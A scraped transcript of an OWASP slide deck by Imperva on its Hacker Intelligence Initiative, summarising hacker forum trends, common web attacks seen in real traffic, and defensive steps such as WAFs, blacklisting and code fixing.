The Rise of China's Hacking Culture: Defining Chinese Hackers
What are hackers hacking
Transcript of What are hackers hacking
![Page 1: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/1.jpg)
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
Don’t Bring A Knife To A Gun
Fight: The Hacker Intelligence
Initiative
Robert Rachwald
Imperva
Director, Security Strategy
![Page 2: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/2.jpg)
OWASP
Agenda
The state of application security
Studying hackers
Why? Prioritizing defenses
How? Methodology
Analyzing real-life attack traffic
Key findings
Technical Recommendations
![Page 3: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/3.jpg)
OWASP
DATA IS HACKER CURRENCY
Why Data Security?
![Page 4: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/4.jpg)
OWASP
The Underground Markets
![Page 5: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/5.jpg)
OWASP
The Underground Markets
![Page 6: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/6.jpg)
OWASP
Website Access Up for Sale
![Page 7: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/7.jpg)
OWASP
Website Access Up for Sale
![Page 8: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/8.jpg)
OWASP
THE CURRENT STATE OF WEB APPLICATION SECURITY
![Page 9: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/9.jpg)
OWASP
WhiteHat Security Top 10 - 2010
Percentage likelihood of a website having at least one vulnerability sorted by class
![Page 10: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/10.jpg)
OWASP
Situation Today
:
:
# of websites (estimated: July 2011)
# of
vulnerabilities
357,292,065
230
x
1%
821,771,600 vulnerabilities in active circulation
![Page 11: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/11.jpg)
OWASP
Situation Today
:
:
# of websites (estimated: July 2011)
# of
vulnerabilities
357,292,065
230
x
1%
821,771,600 vulnerabilities in active circulation
But which will be exploited?
![Page 12: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/12.jpg)
OWASP
Studying Hackers
• Focus on actual threats
– Focus on what hackers want, helping good guys prioritize
– Technical insight into hacker activity
– Business trends of hacker activity
– Future directions of hacker activity
• Eliminate uncertainties
– Active attack sources
– Explicit attack vectors
– Spam content
• Devise new defenses based on real data
– Reduce guess work
![Page 13: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/13.jpg)
OWASP
Understanding the Threat Landscape - Methodology
1. Tap into hacker forums
2. Analyze hacker tools and activity
3. Record and monitor hacker activity
![Page 14: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/14.jpg)
OWASP
PART I: HACKER FORUMS
What are Hackers Hacking?
![Page 15: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/15.jpg)
OWASP
General Topics: Hacker Forum Analysis
25%
6%
21% 22%
3%
5% 8%
3% 2%
3% 2%
Beginner Hacking
Hacking Tutorials
Website and Forum Hacking
Hacking Tools and Programs
Proxies and Socks
Electronic and Gadgets
Cryptography
Dates: 2007- 2011
![Page 16: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/16.jpg)
OWASP
Top 7 Attack Techniques: Hacker Forum Analysis
16%
22%
19%
10%
12%
12%
9% spam
dos/ddos
SQL Injection
zero-day
shell code
brute-force
HTML Injection
Dates: July 2010 -July 2011
![Page 17: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/17.jpg)
OWASP
Growth of Discussion Topics by Year
0
200
400
600
800
1000
1200
1400
1600
2010
2009
2008
2007
Dates: 2007- July 2010
![Page 18: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/18.jpg)
OWASP
Mobile (in)Security
0
200
400
600
800
1000
1200
1400
1600
iPhone Android Blackberry Nokia
Popularity of Mobile Platform (# Threads) 12 Months vs. More than a year ago
12 months
More than a year ago
Dates: July 2010-July 2011
![Page 19: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/19.jpg)
OWASP
Qualitative Analysis
![Page 20: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/20.jpg)
OWASP
PART II: ATTACK TECHNOLOGIES
What are Hackers Hacking?
![Page 21: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/21.jpg)
OWASP
Example: SQL Injection Attack Tools
Havij
SQLMap
![Page 22: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/22.jpg)
OWASP
Attacks from Automated Tools
![Page 23: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/23.jpg)
OWASP
Low Orbit Ion Cannon
![Page 24: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/24.jpg)
OWASP
Low Orbit Ion Cannon
![Page 25: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/25.jpg)
OWASP
Low Orbit Ion Cannon
![Page 26: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/26.jpg)
OWASP
DDoS 2.0
![Page 27: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/27.jpg)
OWASP
DDoS 2.0
1 Compromised Server = 3000 PC- Based Bots
![Page 28: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/28.jpg)
OWASP
PART III: MONITORING TRAFFIC
What are Hackers Hacking?
![Page 29: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/29.jpg)
OWASP
Lesson #1: Automation is Prevailing
On Average:
27 probes per hour
≈ 2 probes per minute
Apps under automated
attack:
25,000 attacks per hour.
≈ 7 per second
![Page 30: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/30.jpg)
OWASP
Lesson #1: Automation is Prevailing
• Example: Google Dorks Campaign
80,000
![Page 31: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/31.jpg)
OWASP
Lesson #1: Automation is Prevailing
![Page 32: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/32.jpg)
OWASP
Lesson #2: The Unfab Four
![Page 33: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/33.jpg)
OWASP
Lesson #2A: The Unfab Four, SQL Injection
![Page 34: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/34.jpg)
OWASP
Lesson #2A: The Unfab Four, SQL Injection
![Page 35: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/35.jpg)
OWASP
Lesson #2B: The Unfab Four, RFI
![Page 36: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/36.jpg)
OWASP
Analyzing the parameters and source of an RFI attack enhances
common signature-based attack detection.
Lesson #2B: The Unfab Four, RFI Lesson #2B: The Unfab Four, RFI
![Page 37: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/37.jpg)
OWASP
Lesson #2C: The Unfab Four, Directory Traversal
![Page 38: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/38.jpg)
OWASP
Lesson #2C: The Unfab Four, Directory Traversal
![Page 39: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/39.jpg)
OWASP
Lesson #2D: The Unfab Four, XSS
![Page 40: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/40.jpg)
OWASP
Lesson #2D: The Unfab Four, XSS
![Page 41: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/41.jpg)
OWASP
Lesson #2D: The Unfab Four XSS: Zooming into Search Engine Poisoning
http://HighRankingWebSite+PopularKeywords+XSS
… http://HighRankingWebSite+PopularKeywords+XSS
![Page 42: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/42.jpg)
OWASP
Lesson #2D: The Unfab Four, XSS
New Search Engine Indexing Cycle
![Page 43: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/43.jpg)
OWASP
LulzSec Activity Samples
![Page 44: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/44.jpg)
OWASP
Lesson #3: Repeating Offenders
The average number of attacks a single host initiated
RFI SQL
Injection Directory Traversal
10 40 25
![Page 45: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/45.jpg)
OWASP
Lesson #3: Repeating Offenders
29% From
10 Sources
Attacks from…
![Page 46: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/46.jpg)
OWASP
MITIGATION
![Page 47: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/47.jpg)
OWASP
Step 1: Dork Yourself (for SQL injection)
Put detection policies in place (using the data source monitoring solution) to depict move of sensitive data to public facing servers.
Regularly schedule “clean ups”. Every once in a while, a clean-up should be scheduled in order to verify that no sensitive data resides in these publicly accessible servers.
Periodically look for new data stores that hold sensitive data. Tools exist today to assist in the task of detecting database servers in the network and classifying their contents.
CONFIDEN
47
![Page 48: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/48.jpg)
OWASP
Step 2: Create and deploy a blacklist of hosts that initiated attacks
48
Blacklisting of: compromised servers, botnet Command and Control (C&C) servers, infected devices, active spam sources, crawlers to acquire intelligence on malicious sources and apply it in real time
Participate in a security community and share data on attacks
Some of the attacks’ scanning is horizontal across similar applications on the internet.
Sort traffic based on reputation
Whitelisting of: legitimate search engine bots, aggregators
![Page 49: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/49.jpg)
OWASP
Step 3: Use a WAF to detect/block attacks
49
Can block many attacks
Relatively easy
Can accelerate SDLC
Not all WAFs created equal
![Page 50: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/50.jpg)
OWASP
WAFs in Reality
50
![Page 51: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/51.jpg)
OWASP
WAFs in Reality
51
![Page 52: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/52.jpg)
OWASP
Step 4: WAF + Vulnerability Scanner
- - 52
“Security No-Brainer #9:
Application Vulnerability Scanners
Should Communicate with
Application Firewalls” —Neil MacDonald, Gartner
Source: http://blogs.gartner.com/neil_macdonald/2009/08/19/security-no-brainer-9-application-vulnerability-scanners-should-communicate-with-application-firewalls/
![Page 53: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/53.jpg)
OWASP
Apply SecureSphere policies based on scan results
Monitor attempts to exploit known vulnerabilities
Fix and test vulnerabilities on your schedule
Virtual Patching through Scanner Integration
Customer Site
Scanner finds vulnerabilities
SecureSphere imports scan
results Monitor and protect Web
applications
Step 4: WAF + Vulnerability Scanner
![Page 54: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/54.jpg)
OWASP
Step 5: Stop Automated Attacks
Detecting protocol anomalies even if they are not considered malicious
Slowing down an attack is most often the best way to make it ineffective (e.g. CAPTCHA, computational challenges)
Feed the client with bogus information (e.g hidden links)
![Page 55: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/55.jpg)
OWASP
Step 6: Code Fixing
Positives:
Root cause fixed
Earlier is cheaper
Issues
Expensive, time consuming.
Never-ending process.
![Page 56: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/56.jpg)
OWASP
Summary: The Anti-Hack Stack
56
Dork Yourself
Blacklist
WAF
WAF + VA
Code Fixing
Stop Automated Attacks
![Page 57: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/57.jpg)
OWASP
QUESTIONS?
![Page 58: What are hackers hacking](https://reader034.fdocuments.us/reader034/viewer/2022051712/586b7aa31a28ab21638b8888/html5/thumbnails/58.jpg)
OWASP
THANK YOU!